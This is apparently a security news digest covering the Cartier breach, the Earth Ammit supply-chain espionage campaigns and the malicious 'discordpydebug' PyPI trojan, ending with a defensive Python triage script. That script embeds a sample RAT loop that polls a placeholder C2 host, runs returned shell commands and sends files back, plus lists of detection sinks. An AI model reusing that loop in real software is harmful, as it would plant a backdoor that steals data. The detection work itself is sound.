Dissent@DataBreaches.Net
//
Luxury brand Cartier has confirmed a data breach impacting its customers. The breach stemmed from a security incident affecting one of its third-party service providers. This incident has exposed sensitive customer information, including names, contact details, and dates of birth. Cartier has notified affected clients and is taking steps to address the breach and reinforce its security measures.
The incident underlines how much risk third-party vendors introduce: a brand is only as secure as the partners that handle its customer data, and organizations need to assess and manage the security posture of their external service providers rather than treat supply chain compromise as a theoretical risk. While details remain limited, the breach comes amid a series of recent cyberattacks on high-end brands in Europe and the U.S.; it is not yet known whether these attacks are related or the work of a single group. According to SecurityWeek, Cartier stated that no passwords, credit card numbers, or banking information were involved. Cartier is owned by Richemont, and the company is working to determine the full scope of the incident and to implement measures to prevent a recurrence.
info@thehackernews.com (The Hacker News)@The Hacker News
//
A cyber espionage group known as Earth Ammit, believed to be linked to Chinese APT groups, has been actively targeting organizations in Taiwan and South Korea through coordinated multi-wave attacks. These campaigns, dubbed VENOM and TIDRONE, were conducted from 2023 to 2024 and aimed to disrupt the drone supply chain by compromising trusted networks. Victims spanned various sectors, including military, satellite, heavy industry, media, technology, software services, and healthcare, highlighting the group's broad targeting scope. The attacks demonstrate Earth Ammit's long-term goal to compromise trusted networks via supply chain attacks, allowing them to target high-value entities downstream and amplify their reach, potentially leading to data theft and exfiltration of credentials.
The VENOM campaign focused on penetrating the upstream segment of the drone supply chain. Attackers exploited web server vulnerabilities to deploy web shells and then relied on open-source tooling such as REVSOCK and Sliver, which makes attribution harder. The only custom malware observed in VENOM was VENFRPC, a customized build of FRPC, the client component of the open-source fast reverse proxy (frp) tool. The goal was to harvest credentials and use them as a stepping stone into the TIDRONE campaign, which targeted downstream customers. TIDRONE ran in multiple stages and mirrored VENOM by compromising service providers in order to inject malicious code and push malware to their downstream customers; the custom CXCLNT and CLNTEND backdoors were used for espionage. Post-exploitation activity included establishing persistence, escalating privileges, disabling antivirus software, and installing screenshot capture tools. Trend Micro researchers have published detections via Trend Vision One™ along with hunting queries and threat intelligence reports to help organizations defend against Earth Ammit's tactics.
@socket.dev
//
A malicious Python package named 'discordpydebug' has been discovered on the Python Package Index (PyPI) repository, posing a significant threat to Discord developers. The package, disguised as a simple utility for debugging Discord bots, actually contains a remote access trojan (RAT). This RAT allows attackers to execute commands and exfiltrate data from infected systems via a covert command-and-control (C2) channel. The 'discordpydebug' package was uploaded on March 21, 2022, and has since been downloaded over 11,000 times, putting numerous developer systems at risk.
The 'discordpydebug' package targets developers who build or maintain Discord bots. The attackers took advantage of the fact that PyPI does not enforce security audits of uploads, misleading developers with a legitimate-sounding name and copying code from popular projects to appear trustworthy. The package phones home to an attacker-controlled server at "backstabprotection.jamesx123.repl[.]co" and, driven by the commands it receives, can read and write arbitrary files and run shell commands. The simplicity of the RAT is what makes it effective: it never listens for inbound connections but polls the server over outbound HTTP, which passes through typical egress firewall rules and attracts little attention from security monitoring, especially in loosely controlled development environments. The discovery highlights the growing danger of software supply chain attacks and the need for vigilance when installing packages from open-source repositories. The Socket Research Team urges developers to be cautious and to scrutinize any third-party tools or code snippets shared within the Discord developer community.
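The behaviour described above (a hard-coded remote host, outbound HTTP polling, and execution or file access driven by what comes back) is easy to triage statically before a package is installed. The following is an added example written for this page, not code from Socket or from the malicious package: it walks a module's AST and flags that combination. The `SUSPECT_MODULE` sample is constructed to mimic the described behaviour using a hypothetical `.invalid` host rather than the real C2, and the sink and network-call lists (`EXEC_SINKS`, `FILE_SINKS`, `NET_CALLS`) are assumptions that a practitioner would extend.

```python
"""Static triage for the C2-polling RAT pattern: outbound HTTP to a hard-coded
host, plus command execution and/or arbitrary file I/O.  Added example; not code
from Socket or from the malicious package."""
import ast
import re
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, List, Optional

# Calls that give an attacker code execution on the host (assumed list, extend as needed).
EXEC_SINKS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
              "subprocess.call", "subprocess.check_output", "exec", "eval"}
# Arbitrary file I/O: normal on its own, suspicious combined with the rest.
FILE_SINKS = {"open"}
# Outbound HTTP calls commonly used to poll a command-and-control server.
NET_CALLS = {"requests.get", "requests.post", "urllib.request.urlopen",
             "httpx.get", "httpx.post"}
URL_RE = re.compile(r"https?://[\w.-]+")


@dataclass
class Finding:
    exec_calls: List[str] = field(default_factory=list)
    file_calls: List[str] = field(default_factory=list)
    net_calls: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)

    @property
    def looks_like_c2_rat(self) -> bool:
        """Heuristic: a literal remote host, outbound HTTP, and a way to act on
        what comes back (run a command or touch arbitrary files)."""
        return bool(self.net_calls and self.urls
                    and (self.exec_calls or self.file_calls))


def _dotted_name(node: ast.AST) -> Optional[str]:
    """Render a call target such as `subprocess.check_output` as a dotted string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # e.g. a method called on the result of another call


def triage_source(src: str) -> Finding:
    """Walk one module's AST and collect its sinks, network calls and literal URLs."""
    finding = Finding()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            tag = f"{name}:{node.lineno}"
            if name in EXEC_SINKS:
                finding.exec_calls.append(tag)
            elif name in FILE_SINKS:
                finding.file_calls.append(tag)
            elif name in NET_CALLS:
                finding.net_calls.append(tag)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            finding.urls.extend(URL_RE.findall(node.value))
    return finding


def triage_tree(root: str) -> Dict[str, Finding]:
    """Triage every .py file under root (an unpacked sdist or wheel) before installing it."""
    return {str(p): triage_source(p.read_text(encoding="utf-8"))
            for p in Path(root).rglob("*.py")}


# Constructed sample mimicking the described behaviour (hypothetical host, not the
# real C2): poll, run the returned command, read the requested file, post results back.
SUSPECT_MODULE = '''
import subprocess, time, requests

C2 = "https://c2.example.invalid/poll"

def debug_loop():
    while True:
        task = requests.get(C2).json()
        if task.get("cmd"):
            out = subprocess.check_output(task["cmd"], shell=True)
            requests.post(C2, data=out)
        elif task.get("read"):
            with open(task["read"], "rb") as fh:
                requests.post(C2, data=fh.read())
        time.sleep(60)
'''

# Constructed sample of what a genuine debug helper looks like: no network, no sinks.
BENIGN_MODULE = '''
import logging

def debug_event(name, payload):
    logging.getLogger("discordbot").debug("%s: %r", name, payload)
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_MODULE), ("benign", BENIGN_MODULE)):
        f = triage_source(src)
        print(label, "RAT-like" if f.looks_like_c2_rat else "clean", f)
```

In practice you would fetch the artifact without installing it (`pip download --no-deps --no-binary :all: <package>`), unpack it, and run `triage_tree` over the directory; a hit is a reason to read the code, not proof of malice, since legitimate tooling also mixes HTTP and subprocess calls. The heuristic deliberately ignores obfuscated strings and dynamic imports, so treat a clean result as a first pass rather than a verdict.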